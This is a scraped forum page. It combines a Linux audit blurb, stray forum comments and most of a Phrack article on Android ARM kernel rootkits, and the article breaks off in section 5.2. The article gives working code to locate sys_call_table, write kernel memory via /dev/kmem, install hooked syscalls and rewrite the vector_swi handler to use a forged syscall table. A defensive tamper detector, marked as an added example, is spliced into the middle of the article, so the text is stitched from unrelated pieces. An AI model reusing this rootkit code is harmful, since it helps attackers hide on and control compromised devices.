The Linux audit framework, as shipped with many Linux distributions, provides a framework that reliably collects information about any security-relevant events. The audit records can be examined to determine whether any violation of the security policies has been committed, and by whom. Linux audit helps make your system more secure by providing you with a means to analyze what is happening on your system in great detail. It does not, however, provide additional security itself: it does not protect your system from code malfunctions or any kind of exploits. Instead, Audit is useful for tracking these issues and helps you take additional security measures to prevent them.

This session provides a basic understanding of how audit works, how it can be set up, how to use various utilities to display, query and archive the audit trail, and how Linux Audit can be part of any overall Defense in Depth strategy.

Source: The Linux Audit Framework
-
Dear Linus, STOP SHOUTING and play nice - says Linux kernel dev
Nytro replied to Matt's topic in Stiri securitate
Yes, he goes by the idea "it's my toy and I do what I want with it", he's a communist... I really like this guy! -
OK, this is being moved to the trash and we await a reply from the author, before he gets banned for a severe neuron deficit.
-
Android platform based linux kernel rootkit

                             ==Phrack Inc.==

               Volume 0x0e, Issue 0x44, Phile #0x06 of 0x13

|=-----------------------------------------------------------------------=|
|=-----------=[ Android platform based linux kernel rootkit ]=-----------=|
|=-----------------------------------------------------------------------=|
|=-----------------=[ dong-hoon you <x82@inetcop.org> ]=-----------------=|
|=------------------------=[ April 04th 2011 ]=--------------------------=|
|=-----------------------------------------------------------------------=|


--[ Contents

  1 - Introduction
  2 - Basic techniques for hooking
    2.1 - Searching sys_call_table
    2.2 - Identifying sys_call_table size
    2.3 - Getting over the problem of structure size in kernel versions
    2.4 - Treating version magic
  3 - sys_call_table hooking through /dev/kmem access technique
  4 - modifying sys_call_table handle code in vector_swi handler routine
  5 - exception vector table modifying hooking techniques
    5.1 - exception vector table
    5.2 - Hooking techniques changing vector_swi handler
    5.3 - Hooking techniques changing branch instruction offset
  6 - Conclusion
  7 - References
  8 - Appendix: earthworm.tgz.uu


--[ 1 - Introduction

This paper covers rootkit techniques that can be used in the Linux kernel
of the Android platform on ARM (Advanced RISC Machine) processors. All the
tests in this paper were performed on the Motoroi XT720 model (2.6.29-omap1
kernel) and the Galaxy S SHW-M110S model (2.6.32.9 kernel). Note that some
contents may not apply to all smart platform machines and there are some
bugs you can modify.

We have seen various Linux kernel hooking techniques from some pioneers
([1][2][3][4][5]). In particular, I thank Silvio Cesare and sd, who
introduced and developed the /dev/kmem technique. Read the references for
more information.

In this paper, we are going to discuss a few hooking techniques:

  1. A simple and traditional hooking technique using the kmem device.
  2. A traditional hooking technique changing the sys_call_table offset in
     the vector_swi handler.
  3. Two newly developed hooking techniques changing the interrupt service
     routine handler in the exception vector table.

The main concepts of the techniques mentioned in this paper are 'smart' and
'simple'. This is because this paper focuses on hooking by modifying the
least kernel memory and in the simplest way. As with the good techniques of
the past, hooking must be possible freely before and after a system call.

This paper consists of eight parts, and I tried to supply various examples
for readers' convenience by putting in abundant appendices. The example
codes are written for the ARM architecture, but if you modify some parts,
you can use them in an ia32 architecture environment and even in an
environment that doesn't support LKM.


--[ 2 - Basic techniques for hooking

sys_call_table is a table which stores the addresses of the low-level
system call routines. Most classical hooking techniques modify
sys_call_table for their purposes. Because of this, some protection
techniques such as hiding the symbol and moving the table into a read-only
area have been adopted to protect sys_call_table from attackers. These
protections, however, can be easily removed if an attacker uses the kmem
device access technique. Discussing other techniques that make such
protection useless is beyond the purpose of this paper.


--[ 2.1 - Searching sys_call_table

If the sys_call_table symbol is not exported and there is no sys_call_table
information in the kallsyms file, which contains the kernel symbol table
information, it will be difficult to get the sys_call_table address, which
varies with each version of the platform kernel. So, we need to research a
way to get the address of sys_call_table without symbol table information.
You can find similar techniques on the web [10], but apart from this, this
paper was written to fit the Android platform in the course of testing.
--[ 2.1.1 - Getting sys_call_table address in vector_swi handler

First, I will introduce two ways to get the sys_call_table address. The
code introduced here depends on the interrupt implementation of the ARM
processor. Generally, in the case of an ARM processor, when an interrupt or
exception happens, it branches to the exception vector table. In that
exception vector table, there are exception handler addresses that match
each exception handler routine. The kernel of the present Android platform
uses the high vector (0xffff0000), and at the point 0xffff0008, offset
0x08, there is a 4-byte instruction to branch to the software interrupt
handler. When the instruction runs, the address of the software interrupt
handler stored at the address 0xffff0420, offset 0x420, is called. See
section 5.1 for more information.

    void get_sys_call_table(){
        void *swi_addr=(long *)0xffff0008;
        unsigned long offset=0;
        unsigned long *vector_swi_addr=0;
        unsigned long sys_call_table=0;

        /* the branch at 0xffff0008 is pc-relative: its 12-bit offset
           plus 8 locates the slot that holds the vector_swi address */
        offset=((*(long *)swi_addr)&0xfff)+8;
        vector_swi_addr=*(unsigned long *)(swi_addr+offset);

        /* walk vector_swi looking for "add r8, pc, #imm" (0xe28f8???) */
        while(vector_swi_addr++){
            if(((*(unsigned long *)vector_swi_addr)&
                0xfffff000)==0xe28f8000){
                offset=((*(unsigned long *)vector_swi_addr)&
                    0xfff)+8;
                sys_call_table=(unsigned long)vector_swi_addr+offset;
                break;
            }
        }
        return;
    }

First, this code gets the address of the vector_swi routine (the software
interrupt exception handler) from the exception vector table of the high
vector, and then gets the address of the code that handles the
sys_call_table address. The following is part of the vector_swi handler
code.

    000000c0 <vector_swi>:
      c0: e24dd048  sub   sp, sp, #72       ; 0x48 (S_FRAME_SIZE)
      c4: e88d1fff  stmia sp, {r0 - r12}    ; Calling r0 - r12
      c8: e28d803c  add   r8, sp, #60       ; 0x3c (S_PC)
      cc: e9486000  stmdb r8, {sp, lr}^     ; Calling sp, lr
      d0: e14f8000  mrs   r8, SPSR          ; called from non-FIQ mode, so ok.
      d4: e58de03c  str   lr, [sp, #60]     ; Save calling PC
      d8: e58d8040  str   r8, [sp, #64]     ; Save CPSR
      dc: e58d0044  str   r0, [sp, #68]     ; Save OLD_R0
      e0: e3a0b000  mov   fp, #0            ; 0x0 ; zero fp
      e4: e3180020  tst   r8, #32           ; 0x20 ; this is SPSR from save_user_regs
      e8: 12877609  addne r7, r7, #9437184  ; put OS number in
      ec: 051e7004  ldreq r7, [lr, #-4]
      f0: e59fc0a8  ldr   ip, [pc, #168]    ; 1a0 <__cr_alignment>
      f4: e59cc000  ldr   ip, [ip]
      f8: ee01cf10  mcr   15, 0, ip, cr1, cr0, {0} ; update control register
      fc: e321f013  msr   CPSR_c, #19       ; 0x13 enable_irq
     100: e1a096ad  mov   r9, sp, lsr #13   ; get_thread_info tsk
     104: e1a09689  mov   r9, r9, lsl #13
  [*]108: e28f8094  add   r8, pc, #148      ; load syscall table pointer
     10c: e599c000  ldr   ip, [r9]          ; check for syscall tracing

The asterisk marks the code that handles sys_call_table. This instruction
computes the start of sys_call_table at a fixed offset from the current pc.
So, we can get the offset value that gives the position of sys_call_table
if we can find the opcode pattern corresponding to the "add r8, pc"
instruction.

    opcode: 0xe28f8???

    if(((*(unsigned long *)vector_swi_addr)&0xfffff000)==0xe28f8000){
        offset=((*(unsigned long *)vector_swi_addr)&0xfff)+8;
        sys_call_table=(unsigned long)vector_swi_addr+offset;
        break;

From this, we can get the address of sys_call_table as handled in the
vector_swi handler routine. And there is an easier way to do this.


--[ 2.1.2 - Finding sys_call_table addr through sys_close addr searching

The second way to get the address of sys_call_table is simpler than the
way introduced in 2.1.1. It uses the fact that the address of sys_close,
which has an exported symbol, sits at index 6 from the starting point of
sys_call_table.

    ... the same vector_swi address searching routine parts omitted ...

        /* sys_call_table lies after vector_swi; entry 6 is sys_close */
        while(vector_swi_addr++){
            if(*(unsigned long *)vector_swi_addr==(unsigned long)&sys_close){
                sys_call_table=(unsigned long)vector_swi_addr-(6*4);
                break;
            }
        }
    }

Using the fact that sys_call_table resides after the vector_swi handler
address, we search for sys_close, which is registered as the sixth system
call of sys_call_table.

    fs/open.c:
    EXPORT_SYMBOL(sys_close);

    ...

    call.S:
    /* 0 */         CALL(sys_restart_syscall)
                    CALL(sys_exit)
                    CALL(sys_fork_wrapper)
                    CALL(sys_read)
                    CALL(sys_write)
    /* 5 */         CALL(sys_open)
                    CALL(sys_close)

This search has the technical disadvantage that we must obtain the
sys_close kernel symbol address beforehand if it is implemented in user
mode.


--[ 2.2 - Identifying sys_call_table size

The hooking technique which will be introduced in section 4 changes the
sys_call_table handling code within the vector_swi handler. It generates a
copy of the existing sys_call_table in heap memory. Because the size of
sys_call_table varies with each platform kernel version, we need the
precise size of sys_call_table to generate a copy.

    ... the same vector_swi address searching routine parts omitted ...

        /* look for "cmp r7, #limit" (0xe357????) and decode its
           rotated immediate: imm8 shifted left by 2*(0x10-rotate) */
        while(vector_swi_addr++){
            if(((*(unsigned long *)vector_swi_addr)&
                0xffff0000)==0xe3570000){
                i=0x10-(((*(unsigned long *)vector_swi_addr)&
                    0xff00)>>8);
                size=((*(unsigned long *)vector_swi_addr)&
                    0xff)<<(2*i);
                break;
            }
        }
    }

This code searches for the instruction that checks the size of
sys_call_table within the vector_swi routine and then extracts the value,
the size of sys_call_table. The following code checks the size of
sys_call_table; it is part of the code that calls the system call stored in
sys_call_table.

     118: e92d0030  stmdb sp!, {r4, r5}     ; push fifth and sixth args
     11c: e31c0c01  tst   ip, #256          ; are we tracing syscalls?
     120: 1a000008  bne   148 <__sys_trace>
  [*]124: e3570f5b  cmp   r7, #364          ; check upper syscall limit
     128: e24fee13  sub   lr, pc, #304      ; return address
     12c: 3798f107  ldrcc pc, [r8, r7, lsl #2] ; call sys_* routine

The asterisk marks the comparison against the size of sys_call_table.
This code checks whether the r7 register value, which contains the system
call number, is bigger than the syscall limit. So, if we search for the
opcode pattern (0xe357????) corresponding to "cmp r7", we can get the exact
size of sys_call_table. For your information, all of the offset values can
be obtained by applying the ARM architecture's operand encoding rules.


--[ 2.3 - Getting over the problem of structure size in kernel versions

Even if you are using the same version of the kernel, the size of a
structure varies according to the compile environment and config options.
Thus, if we use a wrong structure with a wrong size, it is not likely to
work as we expect. To prevent errors caused by differences in structure
offsets, and to enable our code to work in various kernel environments, we
need to build a function which gets the needed offsets from the structure.

    /* task_struct offsets filled in by find_offset() */
    static int comm_offset,next_offset,parent_offset,cred_offset,pid_offset;

    void find_offset(void){
        unsigned char *init_task_ptr=(char *)&init_task;
        unsigned long offset=0;
        int i;
        char *ptr=0;

        /* getting the position of comm offset within task_struct structure */
        for(i=0;i<0x600;i++){
            if(init_task_ptr[i]=='s'&&init_task_ptr[i+1]=='w'&&
                init_task_ptr[i+2]=='a'&&init_task_ptr[i+3]=='p'&&
                init_task_ptr[i+4]=='p'&&init_task_ptr[i+5]=='e'&&
                init_task_ptr[i+6]=='r'){
                comm_offset=i;
                break;
            }
        }

        /* getting the position of tasks.next offset within task_struct structure */
        init_task_ptr+=0x50;
        for(i=0x50;i<0x300;i+=4,init_task_ptr+=4){
            offset=*(long *)init_task_ptr;
            if(offset&&offset>0xc0000000){
                /* candidate pointer to the next task: does its comm read "init"? */
                offset-=i;
                offset+=comm_offset;
                if(strcmp((char *)offset,"init")){
                    continue;
                } else {
                    next_offset=i;
                    /* getting the position of parent offset within task_struct structure */
                    for(;i<0x300;i+=4,init_task_ptr+=4){
                        offset=*(long *)init_task_ptr;
                        if(offset&&offset>0xc0000000){
                            offset+=comm_offset;
                            if(strcmp((char *)offset,"swapper")){
                                continue;
                            } else {
                                parent_offset=i+4;
                                break;
                            }
                        }
                    }
                    break;
                }
            }
        }

        /* getting the position of cred offset within task_struct structure */
        init_task_ptr=(char *)&init_task;
        init_task_ptr+=comm_offset;
        for(i=0;i<0x50;i+=4,init_task_ptr-=4){
            offset=*(long *)init_task_ptr;
            /* real_cred and cred point at the same object for init_task */
            if(offset&&offset>0xc0000000&&offset<0xd0000000&&
                offset==*(long *)(init_task_ptr-4)){
                ptr=(char *)offset;
                /* all ids (uid, gid, suid, sgid, euid, egid, fsuid, fsgid) are 0 */
                if(*(long *)&ptr[4]==0&&
                    *(long *)&ptr[8]==0&&
                    *(long *)&ptr[12]==0&&
                    *(long *)&ptr[16]==0&&
                    *(long *)&ptr[20]==0&&
                    *(long *)&ptr[24]==0&&
                    *(long *)&ptr[28]==0&&
                    *(long *)&ptr[32]==0){
                    cred_offset=i;
                    break;
                }
            }
        }

        /* getting the position of pid offset within task_struct structure */
        pid_offset=parent_offset-0xc;
        return;
    }

This code gets the layout of the PCB (process control block) using some
features that can serve as patterns of the task_struct structure. First, we
search init_task for the process name "swapper" to find the address of the
"comm" variable within the task_struct structure created before the init
process. Then, we search for the "next" pointer of "tasks", which is a
linked list of process structures. Finally, we use the "comm" variable to
figure out whether the process has the name "init". If it does, we get the
offset of the "next" pointer.

    include/linux/sched.h:
    struct task_struct {
    ...
        struct list_head tasks;
    ...
        pid_t pid;
    ...
        struct task_struct *real_parent; /* real parent process */
        struct task_struct *parent; /* recipient of SIGCHLD, wait4() reports */
    ...
        const struct cred *real_cred;   /* objective and real subjective task
                                         * credentials (COW) */
        const struct cred *cred;        /* effective (overridable) subjective task
                                         */
        struct mutex cred_exec_mutex;   /* execve vs ptrace cred calculation mutex */

        char comm[TASK_COMM_LEN]; /* executable name ... */

After this, we get the parent pointer by checking some pointers. If it is
the right parent pointer, it has the name of the previous task process
(init_task), swapper. The reason we search for the address of the parent
pointer is to get the offset of the pid variable using the parent offset as
a base point.

To get the position of the cred structure pointer, which holds the task
privileges, we search backwards from the point of the comm variable and
check that each user id is 0.


--[ 2.4 - Treating version magic

Check the whitepaper [11] of Christian Papathanasiou and Nicholas J.
Percoco from Defcon 18. The paper introduces a way of treating version
magic by modifying the header of utsrelease.h when we compile the LKM
rootkit module. In fact, before they presented, I had used a tool which
overwrites the vermagic value of the compiled kernel module binary directly.


--[ 3 - sys_call_table hooking through /dev/kmem access technique

I hope you take this section as a warm-up. If you want more detailed
background knowledge about the /dev/kmem access technique, check "Run-time
kernel patching" by Silvio and "Linux on-the-fly kernel patching without
LKM" by sd.

At least until now, root access to the /dev/kmem device is allowed in the
Linux kernel of the Android platform. So, it is possible to move through it
with lseek() and to read it with read(). The newly written /dev/kmem access
routines are as follows.
    #define MAP_SIZE 4096UL
    #define MAP_MASK (MAP_SIZE - 1)

    int kmem;

    /* read data from kmem */
    void read_kmem(unsigned char *m,unsigned off,int sz)
    {
        int i;
        void *buf,*v_addr;

        /* map two pages around the page-aligned offset, then copy
           byte by byte from the in-page position */
        if((buf=mmap(0,MAP_SIZE*2,PROT_READ|PROT_WRITE,
            MAP_SHARED,kmem,off&~MAP_MASK))==(void *)-1){
            perror("read: mmap error");
            exit(0);
        }

        for(i=0;i<sz;i++){
            v_addr=buf+(off&MAP_MASK)+i;
            m[i]=*((unsigned char *)v_addr);
        }

        if(munmap(buf,MAP_SIZE*2)==-1){
            perror("read: munmap error");
            exit(0);
        }

        return;
    }

    /* write data to kmem */
    void write_kmem(unsigned char *m,unsigned off,int sz)
    {
        int i;
        void *buf,*v_addr;

        if((buf=mmap(0,MAP_SIZE*2,PROT_READ|PROT_WRITE,
            MAP_SHARED,kmem,off&~MAP_MASK))==(void *)-1){
            perror("write: mmap error");
            exit(0);
        }

        for(i=0;i<sz;i++){
            v_addr=buf+(off&MAP_MASK)+i;
            *((unsigned char *)v_addr)=m[i];
        }

        if(munmap(buf,MAP_SIZE*2)==-1){
            perror("write: munmap error");
            exit(0);
        }

        return;
    }

This code shares the kernel memory at the address we want with the user
memory area, two pages at a time, and then we can read and write the kernel
by reading and writing the shared memory. Even though the sys_call_table we
found is allocated in a read-only area, we can simply modify its contents
through the /dev/kmem access technique. An example of hooking through
sys_call_table modification is as follows.

    kmem=open("/dev/kmem",O_RDWR|O_SYNC);
    if(kmem<0){
        return 1;
    }

    ...

    if(c=='I'||c=='i'){ /* install */
        addr_ptr=(char *)get_kernel_symbol("hacked_getuid");
        write_kmem((char *)&addr_ptr,addr+__NR_GETUID*4,4);

        addr_ptr=(char *)get_kernel_symbol("hacked_writev");
        write_kmem((char *)&addr_ptr,addr+__NR_WRITEV*4,4);

        addr_ptr=(char *)get_kernel_symbol("hacked_kill");
        write_kmem((char *)&addr_ptr,addr+__NR_KILL*4,4);

        addr_ptr=(char *)get_kernel_symbol("hacked_getdents64");
        write_kmem((char *)&addr_ptr,addr+__NR_GETDENTS64*4,4);
    } else if(c=='U'||c=='u'){ /* uninstall */
        ...
    }

    close(kmem);

The attack code can be compiled as an LKM module and as a general ELF32
executable.
--[ 4 - modifying sys_call_table handle code in vector_swi handler routine

The techniques introduced in section 3 are easily detected by rootkit
detection tools. So, some pioneers have researched ways to modify parts of
the exception handler function that processes the software interrupt. The
technique introduced in this section generates a copy of sys_call_table in
kernel heap memory without modifying sys_call_table directly.

    static void *hacked_sys_call_table[500];
    static void **sys_call_table;
    int sys_call_table_size;

    ...

    int init_module(void){
    ...
        get_sys_call_table();   // position and size of sys_call_table
        memcpy(hacked_sys_call_table,sys_call_table,sys_call_table_size*4);

After generating this copy, we have to modify the part of the vector_swi
handler routine that handles sys_call_table. This is because sys_call_table
is handled there as an offset, not as an address. It is a feature that
separates the ARM architecture from the ia32 architecture.

    code before compile:

    ENTRY(vector_swi)
    ...
        get_thread_info tsk
        adr     tbl, sys_call_table     ; load syscall table pointer
                ~~~~~~~~~~~~~~~~~~~~~~~~~~~ -> code of sys_call_table
        ldr     ip, [tsk, #TI_FLAGS]    ; @ check for syscall tracing

    code after compile:

    000000c0 <vector_swi>:
    ...
     100: e1a096ad  mov   r9, sp, lsr #13   ; get_thread_info tsk
     104: e1a09689  mov   r9, r9, lsl #13
  [*]108: e28f8094  add   r8, pc, #148      ; load syscall table pointer
                    ~~~~~~~~~~~~~~~~~~~~
                    +-> deal sys_call_table as relative offset
     10c: e599c000  ldr   ip, [r9]          ; check for syscall tracing

So, I contrived a hooking technique that modifies the "add r8, pc, #offset"
code itself, like this:

    before modifying:
    e28f80??    add r8, pc, #??

    after modifying:
    e59f80??    ldr r8, [pc, #??]

The original instruction computes the address of sys_call_table at the
specified offset from the current pc and stores it in the r8 register; the
replacement instead loads the word stored at that offset into r8. Either
way, what ends up in r8 is used as the address of sys_call_table.
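The pc-relative arithmetic of sections 2.1.1 and 2.2 and the one-word rewrite described in this section can be turned around into an integrity check. The C below is an added example, not code from the Phrack paper or its earthworm appendix: it works on a constructed copy of the vector_swi listing quoted above, placed at its listed offsets (the two words at 0x110 and 0x114 are not on the page, so nop placeholders stand in for them), and the names arm_rotated_imm, classify_table_load, scan_vector_swi, vswi_verdict and make_tampered are chosen here. The scan reproduces sys_call_table = 0x1a4 (matching the listing's symbol) and the 364-entry limit, and reports the load site as tampered once "add r8, pc, #imm" has become "ldr r8, [pc, #imm]". The general rotate-right decoding used here covers every data-processing immediate, of which the paper's "i=0x10-rotate; imm<<(2*i)" is the single case where the rotation wraps to a left shift.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample: the vector_swi words quoted in the paper's listing,
 * placed at their listed offsets 0xc0..0x12c. The words at 0x110 and 0x114
 * are not on the page, so nop (0xe320f000) placeholders stand in for them. */
#define VSWI_BASE 0xc0u
static const uint32_t vector_swi_words[] = {
    0xe24dd048, 0xe88d1fff, 0xe28d803c, 0xe9486000,   /* 0xc0 .. 0xcc */
    0xe14f8000, 0xe58de03c, 0xe58d8040, 0xe58d0044,   /* 0xd0 .. 0xdc */
    0xe3a0b000, 0xe3180020, 0x12877609, 0x051e7004,   /* 0xe0 .. 0xec */
    0xe59fc0a8, 0xe59cc000, 0xee01cf10, 0xe321f013,   /* 0xf0 .. 0xfc */
    0xe1a096ad, 0xe1a09689, 0xe28f8094, 0xe599c000,   /* 0x100 .. 0x10c */
    0xe320f000, 0xe320f000,                           /* 0x110, 0x114: placeholders */
    0xe92d0030, 0xe31c0c01, 0x1a000008,               /* 0x118 .. 0x120 */
    0xe3570f5b, 0xe24fee13, 0x3798f107,               /* 0x124 .. 0x12c */
};
#define VSWI_NWORDS (sizeof vector_swi_words / sizeof vector_swi_words[0])

/* ARM data-processing immediate: an 8-bit value rotated right by twice the
 * 4-bit rotate field. cmp r7,#364 is imm8=0x5b rotated right by 30. */
uint32_t arm_rotated_imm(uint32_t insn)
{
    uint32_t imm8 = insn & 0xff;
    uint32_t rot = ((insn >> 8) & 0xf) * 2;
    return rot ? (imm8 >> rot) | (imm8 << (32 - rot)) : imm8;
}

enum table_load { LOAD_OTHER = 0, LOAD_ADD_PC = 1, LOAD_LDR_PC = 2 };

/* How vector_swi puts the table pointer in r8: the kernel's own
 * "add r8, pc, #imm" or the "ldr r8, [pc, #imm]" rewrite of section 4. */
int classify_table_load(uint32_t insn)
{
    if ((insn & 0xfffff000) == 0xe28f8000) return LOAD_ADD_PC;
    if ((insn & 0xfffff000) == 0xe59f8000) return LOAD_LDR_PC;
    return LOAD_OTHER;
}

struct vswi_info {
    uint32_t load_site;   /* address of the r8 load, 0 if absent */
    int load_kind;        /* classify_table_load() of that word */
    uint32_t table_addr;  /* pc-relative target (add) or loaded literal (ldr) */
    uint32_t table_size;  /* immediate of "cmp r7, #N", 0 if absent */
};

/* Walk a copy of vector_swi (words w[0..n) starting at address base) and
 * recover what sections 2.1.1 and 2.2 compute, plus the kind of load. */
int scan_vector_swi(const uint32_t *w, size_t n, uint32_t base,
                    struct vswi_info *out)
{
    memset(out, 0, sizeof *out);
    for (size_t i = 0; i < n; i++) {
        uint32_t pc = base + 4u * (uint32_t)i;   /* ARM reads pc as insn + 8 */
        int kind = classify_table_load(w[i]);
        if (!out->load_site && kind != LOAD_OTHER) {
            out->load_site = pc;
            out->load_kind = kind;
            if (kind == LOAD_ADD_PC) {
                out->table_addr = pc + 8 + arm_rotated_imm(w[i]);
            } else {
                /* ldr: the 12-bit byte offset names a literal slot; the table
                 * pointer is whatever that slot holds (0 if outside our copy) */
                size_t slot = (pc + 8 + (w[i] & 0xfff) - base) / 4;
                out->table_addr = slot < n ? w[slot] : 0;
            }
        }
        if (!out->table_size && (w[i] & 0xfffff000) == 0xe3570000)
            out->table_size = arm_rotated_imm(w[i]);   /* cmp r7, #N */
    }
    return out->load_site != 0 && out->table_size != 0;
}

/* Defender's verdict: a rewritten load means system calls are no longer
 * dispatched through the kernel's own sys_call_table. */
const char *vswi_verdict(const struct vswi_info *info)
{
    if (!info->load_site) return "no table load found";
    return info->load_kind == LOAD_ADD_PC ? "pristine" : "tampered";
}

/* Constructed "after" image: the word at 0x108 rewritten as section 4
 * describes, offset 0x18c - 0x108 - 8 = 0x7c pointing at the patched nop. */
void make_tampered(uint32_t *dst)
{
    memcpy(dst, vector_swi_words, sizeof vector_swi_words);
    dst[(0x108 - VSWI_BASE) / 4] = 0xe59f807c;
}

int main(void)
{
    struct vswi_info info;
    uint32_t tampered[VSWI_NWORDS];
    scan_vector_swi(vector_swi_words, VSWI_NWORDS, VSWI_BASE, &info);
    printf("table at 0x%x, %u entries, load at 0x%x: %s\n", info.table_addr,
           info.table_size, info.load_site, vswi_verdict(&info));
    make_tampered(tampered);
    scan_vector_swi(tampered, VSWI_NWORDS, VSWI_BASE, &info);
    printf("load at 0x%x: %s\n", info.load_site, vswi_verdict(&info));
    return 0;
}
```

On a live device the words would come from a trusted copy of the kernel text (for instance the vmlinux the image was built from) rather than from /dev/kmem, which the paper relies on and which current kernels no longer provide (the device was removed in Linux 5.13); comparing the running text against that copy catches the single-word rewrite regardless of whether sys_call_table itself still looks intact.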
Now we have to make a separate space, near the processing routine, to store
the address of the sys_call_table copy. After some consideration, I decided to
overwrite a nop in the epilogue of another function near the vector_swi
handler.

    00000174 <__sys_trace_return>:
         174:   e5ad0008    str r0, [sp, #8]!
         178:   e1a02007    mov r2, r7
         17c:   e1a0100d    mov r1, sp
         180:   e3a00001    mov r0, #1    ; 0x1
         184:   ebfffffe    bl 0 <syscall_trace>
         188:   eaffffb1    b 54 <ret_to_user>
    [*]  18c:   e320f000    nop {0}
                            ~~~~~~~~  -> position to overwrite with the address of the sys_call_table copy
         190:   e320f000    nop {0}
    ...
    000001a0 <__cr_alignment>:
         1a0:   00000000    ....
    000001a4 <sys_call_table>:

Now, if we compute the offset from the sys_call_table handle code to the
address overwritten with the address of the sys_call_table copy and modify
the code accordingly, the copied table is used whenever a system call is
made. The hooking code that modifies the vector_swi handling routine and the
nop near sys_call_table is as follows:

    void install_hooker(){
        void *swi_addr=(long *)0xffff0008;
        unsigned long offset=0;
        unsigned long *vector_swi_addr=0,*ptr;
        unsigned char buf[MAP_SIZE+1];
        unsigned long modify_addr1=0;
        unsigned long modify_addr2=0;
        unsigned long addr=0;
        char *addr_ptr;

        offset=((*(long *)swi_addr)&0xfff)+8;
        vector_swi_addr=*(unsigned long *)(swi_addr+offset);

        memset((char *)buf,0,sizeof(buf));
        read_kmem(buf,(long)vector_swi_addr,MAP_SIZE);
        ptr=(unsigned long *)buf;

        /* get the address of ldr that handles sys_call_table */
        while(ptr){
            if(((*(unsigned long *)ptr)&0xfffff000)==0xe28f8000){
                modify_addr1=(unsigned long)vector_swi_addr;
                break;
            }
            ptr++;
            vector_swi_addr++;
        }

        /* get the address of nop that will be overwritten */
        while(ptr){
            if(*(unsigned long *)ptr==0xe320f000){
                modify_addr2=(unsigned long)vector_swi_addr;
                break;
            }
            ptr++;
            vector_swi_addr++;
        }

        /* overwrite nop with hacked_sys_call_table */
        addr_ptr=(char *)get_kernel_symbol("hacked_sys_call_table");
        write_kmem((char *)&addr_ptr,modify_addr2,4);

        /* calculate fake table offset */
        offset=modify_addr2-modify_addr1-8;

        /* change sys_call_table offset into fake table offset */
        addr=0xe59f8000+offset; /* ldr r8, [pc, #offset] */
        addr_ptr=(char *)addr;
        write_kmem((char *)&addr_ptr,modify_addr1,4);
        return;
    }

This code gets the address of the instruction that references sys_call_table
within the vector_swi handler routine, then finds a nop nearby and stores the
address of hacked_sys_call_table, the copy of sys_call_table, there. After
that, the sys_call_table handle code is rewritten to load the table pointer
from the offset at which hacked_sys_call_table now resides, and hooking
starts.

--[ 5 - exception vector table modifying hooking techniques

This section discusses two hooking techniques: one changes the address of the
software interrupt exception handler routine within the exception vector
table, and the other changes the offset of the instruction branching to the
vector_swi handler. The purpose of both is to implement hooking that modifies
only the exception vector table, without changing sys_call_table or the
vector_swi handler.

--[ 5.1 - exception vector table

The exception vector table contains the addresses of the various exception
handler routines, the branch code array and the processing code that calls
the exception handler routines. These are declared in entry-armv.S and copied
to the high vector (0xffff0000) by the early_trap_init() routine in traps.c,
where together they make up one exception vector table.

traps.c:

    void __init early_trap_init(void)
    {
        unsigned long vectors = CONFIG_VECTORS_BASE; /* 0xffff0000 */
        extern char __stubs_start[], __stubs_end[];
        extern char __vectors_start[], __vectors_end[];
        extern char __kuser_helper_start[], __kuser_helper_end[];
        int kuser_sz = __kuser_helper_end - __kuser_helper_start;

        /*
         * Copy the vectors, stubs and kuser helpers (in entry-armv.S)
         * into the vector page, mapped at 0xffff0000, and ensure these
         * are visible to the instruction stream.
         */
        memcpy((void *)vectors, __vectors_start, __vectors_end - __vectors_start);
        memcpy((void *)vectors + 0x200, __stubs_start, __stubs_end - __stubs_start);

After the processing code has been copied in order by early_trap_init(), the
exception vector table is initialized and looks as follows.

    # ./coelacanth -e
    [000] ffff0000: ef9f0000 [Reset]           ; svc 0x9f0000        branch code array
    [004] ffff0004: ea0000dd [Undef]           ; b 0x380
    [008] ffff0008: e59ff410 [SWI]             ; ldr pc, [pc, #1040] ; 0x420
    [00c] ffff000c: ea0000bb [Abort-perfetch]  ; b 0x300
    [010] ffff0010: ea00009a [Abort-data]      ; b 0x280
    [014] ffff0014: ea0000fa [Reserved]        ; b 0x404
    [018] ffff0018: ea000078 [IRQ]             ; b 0x608
    [01c] ffff001c: ea0000f7 [FIQ]             ; b 0x400
    [020] Reserved
    ... skip ...
    [22c] ffff022c: c003dbc0 [__irq_usr]       ; exception handler routine addr array
    [230] ffff0230: c003d920 [__irq_invalid]
    [234] ffff0234: c003d920 [__irq_invalid]
    [238] ffff0238: c003d9c0 [__irq_svc]
    [23c] ffff023c: c003d920 [__irq_invalid]
    ...
    [420] ffff0420: c003df40 [vector_swi]

When a software interrupt occurs, the 4-byte instruction at 0xffff0008 is
executed. It loads pc with the exception handler address stored at offset
0x420 of the exception vector table; in other words, it branches to the
vector_swi handler routine.

--[ 5.2 - Hooking techniques changing vector_swi handler

The first technique changes the address of the exception handler routine that
processes the software interrupt within the exception vector table, so that a
vector_swi handler routine forged by the attacker is called instead.

1. Generate the copy of sys_call_table in kernel heap and then change the
   address of the routine as described above.
2. For simple hooking, copy not the whole vector_swi handler routine but only
   the code before the sys_call_table handle code to kernel heap.
3.
   Fill in the right values so that the copied fake vector_swi handler
   routine acts normally, and change the code to refer to the address of the
   sys_call_table copy generated in step 1.
4. Jump to the instruction following the sys_call_table handle code of the
   original vector_swi handler routine.
5. Change the address of the vector_swi handler routine in the exception
   vector table to the address of the fake vector_swi handler code.

The completed fake vector_swi handler looks like the following.

    00000000 <new_vector_swi>:
          00:   e24dd048    sub sp, sp, #72    ; 0x48
          04:   e88d1fff    stmia sp, {r0 - r12}
          08:   e28d803c    add r8, sp, #60    ; 0x3c
          0c:   e9486000    stmdb r8, {sp, lr}^
          10:   e14f8000    mrs r8, SPSR
          14:   e58de03c    str lr, [sp, #60]
          18:   e58d8040    str r8, [sp, #64]
          1c:   e58d0044    str r0, [sp, #68]
          20:   e3a0b000    mov fp, #0    ; 0x0
          24:   e3180020    tst r8, #32    ; 0x20
          28:   12877609    addne r7, r7, #9437184
          2c:   051e7004    ldreq r7, [lr, #-4]
    [*]   30:   e59fc020    ldr ip, [pc, #32]    ; 0x58 <__cr_alignment>
          34:   e59cc000    ldr ip, [ip]
          38:   ee01cf10    mcr 15, 0, ip, cr1, cr0, {0}
          3c:   f1080080    cpsie i
          40:   e1a096ad    mov r9, sp, lsr #13
          44:   e1a09689    mov r9, r9, lsl #13
    [*]   48:   e59f8000    ldr r8, [pc, #0]
    [*]   4c:   e59ff000    ldr pc, [pc, #0]
    [*]   50:   <hacked_sys_call_table address>
    [*]   54:   <vector_swi address to jmp>
